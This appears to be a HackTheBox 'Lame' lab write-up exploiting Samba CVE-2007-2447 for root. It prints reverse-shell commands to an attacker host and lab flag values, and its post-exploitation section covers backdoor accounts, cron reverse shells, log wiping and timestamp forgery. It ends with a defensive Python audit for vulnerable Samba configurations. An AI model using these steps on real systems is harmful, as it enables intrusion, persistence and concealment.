HackTheBox Lame

Writeup for HackTheBox Lame

Machine Synopsis

Key Exploitation Techniques:

  • Samba usermap script vulnerability (CVE-2007-2447)
  • Remote code execution to immediate root access
  • Alternative exploitation paths analysis

Reconnaissance & Enumeration

Port Discovery

$ nmap -p- --min-rate 10000 10.10.10.3
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Service Enumeration

$ nmap -p 21,22,139,445 -sC -sV 10.10.10.3
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)

Vulnerability Research

$ searchsploit vsftpd 2.3.4
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/17491.rb

$ searchsploit samba 3.0.20
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution | unix/remote/16320.rb

Exploitation

Failed Attempt: vsftpd 2.3.4 Backdoor

$ msfconsole -q
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

Successful Exploitation: Samba CVE-2007-2447

Manual Exploitation

# Download the exploit
$ wget https://raw.githubusercontent.com/amriunix/CVE-2007-2447/master/usermap_script.py

# Setup netcat listener
$ nc -nlvp 1234

# Execute exploit
$ python usermap_script.py 10.10.10.3 445 10.10.14.3 1234
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !

Root Shell Access

$ nc -nlvp 1234
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.3] 34329
id
uid=0(root) gid=0(root)

cd /root
cat root.txt
1958f8c5ebfa347cc8dc6b7c35a3b132

cd /home/makis
cat user.txt
a848bb4bcd8a9651138d9cfa73d4d16e

Post-Exploitation Techniques

Persistence Methods

SSH Key Installation

# Generate SSH key pair
$ ssh-keygen -t rsa -b 2048 -f lame_key

# Install public key on target
echo "ssh-rsa AAAAB3NzaC1yc2E..." >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
chmod 700 /root/.ssh

# Test SSH access
$ ssh -i lame_key root@10.10.10.3

Backdoor User Account

# Create backdoor user with root privileges
useradd -m -s /bin/bash -G sudo backup
echo 'backup:password123' | chpasswd
echo "backup ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers

Cron Job Persistence

# Add persistent reverse shell cron job
echo "*/5 * * * * root /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/4444 0>&1'" >> /etc/crontab

# Verify the entry (crontab -l only lists the per-user crontab, not /etc/crontab)
tail -n 1 /etc/crontab

Defense Evasion

Log Cleanup

# Clear system logs
echo > /var/log/auth.log
echo > /var/log/syslog
echo > /var/log/daemon.log

# Clear Samba logs
echo > /var/log/samba/log.smbd
echo > /var/log/samba/log.nmbd

# Clear bash history
history -c
echo > /root/.bash_history
unset HISTFILE

File Timestamp Manipulation

# Match timestamps to system files
touch -r /bin/bash /tmp/backdoor
touch -r /etc/passwd /root/.ssh/authorized_keys

Lateral Movement Preparation

Network Discovery

# Discover network hosts
nmap -sn 10.10.10.0/24

# Port scanning
nmap -sS -A 10.10.10.1-254

Credential Harvesting

# Search for stored credentials
grep -r "password" /etc/ 2>/dev/null | grep -v "Binary"
find /home \( -name "*.txt" -o -name "*.conf" -o -name "*.xml" \) -print0 | xargs -0 grep -l "password" 2>/dev/null

# Check Samba configuration
grep -E "(user|pass)" /etc/samba/smb.conf

Alternative Exploitation Methods

Metasploit Module

msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.3
msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 10.10.14.3:4444 
[*] Command shell session 1 opened
id
uid=0(root) gid=0(root)

Manual SMB Client Exploitation

# Connect using smbclient with malicious username
$ smbclient //10.10.10.3/tmp
smb: \> logon "/=`nohup nc -e /bin/sh 10.10.14.3 1337`"
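The logon command above works because the affected Samba builds handed the client-supplied username to the configured `username map script` through a shell without escaping it, so a backtick sequence in the username is executed by smbd. As an added defensive check (not part of the original writeup), the following Python audits an smb.conf for that directive, tests a Samba version banner against the searchsploit range quoted earlier, and flags usernames carrying shell metacharacters; the config sample and the function names are constructed for this example.

```python
import re
from typing import Dict, List, Tuple

# Constructed smb.conf sample (not from the Lame box). The "username map script"
# directive is what CVE-2007-2447 abuses: affected builds ran it via a shell unescaped.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   username map script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
"""

SHELL_META = re.compile(r"[`;|&\n]|\$\(")  # backtick, $( ), ;, |, &, newline

def parse_smb_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal smb.conf parser: [sections], 'key = value', '#'/';' comments.
    Samba ignores case and whitespace in option names, so keys are normalised."""
    sections: Dict[str, Dict[str, str]] = {}
    current = "global"
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        key, sep, value = line.partition("=")
        if sep:
            sections.setdefault(current, {})[re.sub(r"\s+", "", key).lower()] = value.strip()
    return sections

def username_map_scripts(text: str) -> List[Tuple[str, str]]:
    """(section, script) pairs where 'username map script' is configured."""
    return [(sec, opts["usernamemapscript"]) for sec, opts in parse_smb_conf(text).items()
            if "usernamemapscript" in opts]

def is_affected_version(banner: str) -> bool:
    """True for Samba 3.0.20 <= version < 3.0.25rc3, the searchsploit range above."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?", banner)
    if not m:
        return False
    ver = tuple(int(x) for x in m.groups()[:3])
    rc = m.group(4)
    return (3, 0, 20) <= ver < (3, 0, 25) or (ver == (3, 0, 25) and rc is not None and int(rc) < 3)

def suspicious_username(name: str) -> bool:
    """Flag SMB usernames carrying shell metacharacters (the CVE-2007-2447 shape)."""
    return bool(SHELL_META.search(name))
```

Run the audit against a real smb.conf and the `nmap -sV` banner; a configured map script on a version inside the range, or usernames of this shape in Samba's logs, is the signal to patch or remove the directive.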

This post is licensed under CC BY 4.0 by the author.